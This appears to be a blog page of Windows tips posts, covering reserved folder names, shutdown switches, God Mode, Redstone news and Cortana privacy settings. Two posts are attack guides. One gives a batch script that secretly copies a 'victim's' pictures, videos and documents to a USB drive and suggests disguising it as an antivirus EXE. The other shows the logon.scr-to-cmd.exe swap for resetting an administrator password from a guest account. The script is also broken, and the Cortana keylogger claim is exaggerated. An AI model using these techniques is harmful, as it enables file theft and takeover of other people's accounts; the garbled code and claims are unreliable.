Showing posts with label Windows. Show all posts
Showing posts with label Windows. Show all posts

Monday, February 8, 2016

How To Make/Delete an Undelete-able,Unrename-able Folder

In Windows OS Nobody can Direct Create Folders by Name CON, lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 , COM1,, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9 PRN, AUX, NUL




But There is a Way to Create Folder with the Name of All Those described above
Just open Command Prompt(CMD) 

Enter Below Code To Make Con Folder in c:

mkdir c:\con\

To Remove Directory Simply Type Code


rmdir c:\con\

or

rmdir c:\con\ /s /q

Definition:

mkdir is Command String to Make a Directory
c:\con\ is Directory Which Would be Created.
You Can Also Change con with lpt1,...lpt9 , COM1.... COM9 PRN, AUX, NUL
example: mkdir c:\AUX\
rmdir is also a Command String to delete\remove a Directory.

Keep Browsing H2Five ...

Saturday, January 16, 2016

Shutdown Commands for CMD (Windows)

Usage: shutdown [-i | -l | -s | -r | -a] [-f] [-m \\computername] [-t xx] [-c "comment"] [-d up:xx:yy]



        No args                 Display this message (same as -?)
        -i                      Display GUI interface, must be the first option
        -l                      Log off (cannot be used with -m option)
        -s                      Shutdown the computer
        -r                      Shutdown and restart the computer
        -a                      Abort a system shutdown
        -m \\computername       Remote computer to shutdown/restart/abort
        -t xx                   Set timeout for shutdown to xx seconds
        -c "comment"            Shutdown comment (maximum of 127 characters)
        -f                      Forces running applications to close without warning
        -d [u][p]:xx:yy         The reason code for the shutdown
                                u is the user code
                                p is a planned shutdown code
                                xx is the major reason code (positive integer less than 256)
                                yy is the minor reason code (positive integer less than 65536)

Monday, December 14, 2015

Microsoft Will Soon Introduce an OS For Mobile named As REDSTONE

An internal build of Windows 10 Mobile's next major update, Redstone, has been spotted on Buildfeed and it could be headed to Windows Insiders in the near future.




It hasn't been long since Microsoft delivered the first major update for Windows 10 and Windows 10 Mobile but the company is already busy developing the OS' next update which is expected to roll out next year. According to Buildfeed, the latest Windows 10 Mobile build from the Redstone branch that is being used internally, is 10.0.11082.1000.rs1_release.151210-2021.

Microsoft is currently planning to push regular monthly updates to Windows 10 in the meantime, and the company has already revealed its "Windows as a service" plans that accompany this. Windows 10 will ship this summer, but Microsoft will continue to update it and components that aren’t core to the operating system on a regular basis. As part of those plans, elements like Project Spartan, Microsoft’s new browser for Windows 10, will be updated through the Windows Store to ensure features can make their way to users at a more rapid pace. Microsoft moved a lot of the core features of Windows Phone to this model last year, and it’s something the company is increasingly doing across Windows as a whole.
The Windows Redstone updates won’t be seen as a Windows 11 or Windows 12, but more of a Windows 10.1, with new features added to the core for all difference device types to take advantage of. Microsoft is currently planning to detail more of its HoloLens and Windows 10 development plans at Build later this month, and it’s possible the company may discuss Windows as a service and Redstone. We understand the Redstone name was first used around two months ago inside Microsoft, so it may still be a little early for the company to share its plans.

How To Turn On God Mode in Windows 7/8/8.1 ?


You wouldn't know it by looking at the Desktop or Start screen, but Windows 8 practically bristles with settings you can customize. The problem is that they're scattered throughout Windows 8, and it can be time-consuming to track them down individually.

However, there is one way to find them all in one place: You can use what some people call "God Mode." While the term "God Mode" has a powerful ring to it, the truth is it's not a separate mode that you put Windows into. It's really a hidden folder that gives you fast access to many settings spread out across Windows 8. It's easy to put that folder right on the Desktop.

Go to Desktop
Create a new Folder and Name it as below
GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

It Turns it into a Shell to GodMode.

How To Turn Off Windows 10 Keylogger?Yes It Has a one...

Windows 10 Users You Must Be Know That Windows 10 Include a Key-logger named as Cortana .

Microsoft pretty much admits it has a key-logger in its Windows 10 speech, inking, typing, and privacy FAQ: “When you interact with your Windows device by speaking, writing (handwriting), or typing, Microsoft collects speech, inking, and typing information—including information about your Calendar and People (also known as contacts)…”
Key logger is a Software Which Collects Information About Us,Our Typing , Our Screenshot Our Voice and Send it To Someone Who is Tracking You And Who is The Developer.Its

Due to several privacy issues built into Windows 10, Microsoft has gained a bad reputation

  • Click on the Start Menu, then open Settings.
  • Click on Privacy settings, which you'll find in the very last row of the menu.
  • Once you are in the Privacy menu, click on General
  • Under 'Send Microsoft info about how I write to help use improve typing and writing in the future' – Turn it to Off.
  • Now move ahead to the 'Speech, Inking and Typing' menu and click Stop getting to know me. This will help you turn off the speech tracking through dictation or Cortana.




Out of All Cortana has Great Features Also .Read Here

Friday, December 11, 2015

How To Copy Files From Someones PC Using USB Flash Make A Copying Virus :)

Please Note That This Trick is Educational Purpose only not to harm Someone

This is a Code Just Copy and Paste into Notepad and Save it as Something.bat
(Note: .bat Must be Determined)

@echo off 
:: variables 
/min 
SET odrive=%odrive:~0,2% 
set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "D:\*.jpg" "%drive%\all\notes"
%backupcmd% "e:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.txt" "%drive%\all\notes"
%backupcmd% "g:\*.jpg" "%drive%\all\notes"
@echo off 
cls

This Code can Copy All data from Documents>Pictures , Favourites , Videos and All Pictures and Text Docs From victom's D: , E: , F: , G: Drives into a Folder

Make This Code Working Perfect For You :-)
Simply Edit Code as Below

@echo off 
:: variables 
/min 
SET odrive=%odrive:~0,2% 
set backupcmd=xcopy /s /c /d /e /h /i /r /y 
echo off 
%backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 
%backupcmd% "%USERPROFILE%\videos" "%drive%\all\vids"
%backupcmd% "D:\*.jpg" "%drive%\all\notes"
%backupcmd% "e:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.jpg" "%drive%\all\notes"
%backupcmd% "f:\*.txt" "%drive%\all\notes"
%backupcmd% "g:\*.jpg" "%drive%\all\notes"
@echo off 
cls

See Code Up You Can Change Files types to be Copied
.jpg >> Jpeg Pictures
.png >> Png Pictures
.bmp >> BMP Pictures
.doc >> MS Word Documents
.xls >> Exel Files
.mp3 , .amr etc>>Audio Files
.mp4 , .3gp , .avi , .wmv , .flv >>>> video files
etc

You Can Also Convert bat File into EXE so It Looks Like A Software as an Antivirus using Bat to exe Converter




++++++++++++++++++++++++++++++++++++++++++++
Download Links : Bat To Exe Converter (32bit) / Mirror

                        Bat To Exe Converter (64 bit) / Mirror
++++++++++++++++++++++++++++++++++++++++++++

Hack Admin Account using cmd By Guest Account



First of All open CMD .
(go to Start>all Whprogramtmes>Accessories>Command Prompt)
or (Press Windows key+R and Type "cmd" and enter)

Now type
Cd\
(it changes Working Directory)
and Now Type Each Line Seprately

Cd\windows\system32
Mkdir temphack
Copy logon.scr temphack\logon.scr
Copy cmd.exe temphack\cmd.exe
Del logon.scr
Rename cmd.exe logon.scr 
Exit Net user

Restart Your Pc Now When System Restarted it open CMD as Administrator Account
Now Type

Net user ###### *****

(Here ##### is ADMIN Account name and ***** is a new Hacked Password)